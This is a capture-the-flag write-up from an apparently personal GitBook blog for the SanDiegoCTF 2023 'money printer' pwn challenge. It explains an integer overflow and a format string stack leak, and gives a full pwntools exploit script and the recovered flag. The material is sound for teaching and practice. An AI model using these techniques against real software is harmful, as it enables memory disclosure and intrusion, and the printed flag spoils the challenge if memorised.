HyggeHalcyon
GithubLinkedIn
  • 🕊️whoami
  • 🚩CTFs
    • 2025
      • ARKAVIDIA Quals
      • TECHOMFEST Quals
    • 2024
      • BackdoorCTF
      • World Wide CTF
      • 7th Cyber Mimic Defense
      • TSA Cyber Champion
      • Cyber Jawara International
      • National Cyber Week Quals
      • COMPFEST 16 Finals
      • HackToday Finals
      • UIUCTF
      • TBTL CTF
      • BSidesSF CTF
      • UMD CTF
      • UMassCTF
      • b01lers CTF
      • AmateursCTF
      • UNbreakable International - Team Phase
    • 2023
      • HackToday CTF Quals
        • Vnote
        • TahuBulat
        • Rangkaian Digital
      • Tenable CTF
        • Skiddyana Pwnz and the Loom of Fate
        • Braggart
      • CiGITS
        • afafafaf
        • popping around shell
        • well_known
      • TJCTF
        • flip out
        • shelly
        • groppling-hook
        • formatter
        • teenage-game
      • SanDiegoCTF
        • money printer
        • turtle shell
      • DeadSec CTF
        • one punch
      • FindIT CTF Quals
        • Debugging Spiders
        • Everything Machine
        • Furr(y)verse
        • Bypass the Py
        • Joy Sketching in the Matrix
        • Detective Handal
        • I Like Matrix
        • CRYptograPI
        • Date Night
        • Web-Find IT
        • Mental Health Check
        • NCS Cipher
        • Discovered
  • 🔍NOTES
    • FSOP
      • Structures
      • GDB
      • Arbitrary Read/Write
      • Vtable Hijack
    • Heap Feng Shui
      • Libc Leak
    • Kernel Space
      • Privilege Escalation
      • Objects
      • Escaping Seccomp
    • V8
      • Documentation
      • TurboFan
      • SandBox (Ubercage)
  • 📚Resources
    • Cyber Security
      • General
      • Red Teaming
        • CheatSheet
        • Payload Database
        • Quality of Life
      • Binary Exploitation
        • Return Oriented Programming
        • File Structure Oriented Programming
        • Heap Exploitation
        • Linux Kernel Exploitation
        • Windows Exploitation
        • V8 Browser
      • Reverse Engineering
        • Windows Executable
        • Malware Analysis
        • Tools
      • Web Exploitation
      • Malware Development
      • Detection Engineering
      • Blockchain / Web3
      • Cryptography
    • Software Engineering
  • 📋Planning
    • Quick Notes
Powered by GitBook
On this page
  • Problem
  • Solution
  • Flag
  1. CTFs
  2. 2023
  3. SanDiegoCTF

money printer

Integer overflow and format string vulnerability

PreviousSanDiegoCTFNextturtle shell

Last updated 1 year ago

Problem

Description

The first step to getting rich is printing money

Connect via: nc money.sdc.tf 1337

Solution

We're given a binary and the only function that is in our interest is the main function, let's decompiled and analyse it

In the snippet above, we see that the flag is being into a buffer variable within the stack

In this snippet, the program takes an integer input and as long as our input is under 100 and under the value of money. Basically this is an ATM-like machine where you take money and it records the current money you have and the money you have taken so far. Initially we're supplied a money amount of 100, but since the check only limits us to provide an input under 100, we can supply a negative value to overflow the Integer.

Here, on line 57 we noticed the program calls printf with our desire input without any format specifier. We can exploit this to read from the stack to leak the flag. However, code will only ran if the money we had taken is over 1000 while the money we had is only 100. This is where our Integer overflow will come to play, since taken_money is set to 0, we can provide a negative value for the Integer to overflow and set its value to the maximum and thus more than 1000 and satisfy the condition.

Next we need to leak the stack find the offset where our flag is located. Below I have supply the format string vuln to leak the various addresses/values off the stack. We can also do some fuzzing script with the same script I use below with range starting from 1 to how far we wish to. In the leaked stack anything that starts with \x7f or has long series of \xf in them is possibly a address. However on the 10th index we see somewhat a hex value representing a string.

We can try to unhex it and it is the start of the flag in reverse order, this is because the program in run in little endian. And we can continue this for the the next value, until we found that the flag is located in the 10th element until the 15th element in the stack.

exploit.py
#!user/bin/python3
from pwn import *

# =========================================================
#                          SETUP                         
# =========================================================
exe = './money-printer'
elf = context.binary = ELF(exe, checksec=True)
context.log_level = 'warn'

# =========================================================
#                         EXPLOITS
# =========================================================

flag = ""

for i in range(10, 16):
    try:
        # io = process(exe)
        io = remote('money.sdc.tf', 1337)
        # overwriting dollar variable
        io.sendlineafter(b'how many of them do you want?', b'-1')
        # format string vuln
        io.sendlineafter(b'to the audience?', f'%{i}$p'.encode())
        io.recvuntil(b'\n')
        leak = io.recvline()
        if not b'nil' in leak:
            print(f'stack at {i} :' + str(leak))
            try:
                hexform = unhex(leak.split()[3][2:].decode())
                flag += hexform.decode()[::-1]
                print('flag appended')
            except BaseException:
                pass
        io.close()
    except EOFError or UnicodeDecodeError:
        pass

print(f'{flag=}')

Flag

sdctf{d4mn_y0u_f0unD_4_Cr4zY_4M0uN7_0f_M0n3y}

🚩
1st decompiled main segment
2nd decompiled main segment
3rd decompiled main segment
leaking stack values
unhexed 10th element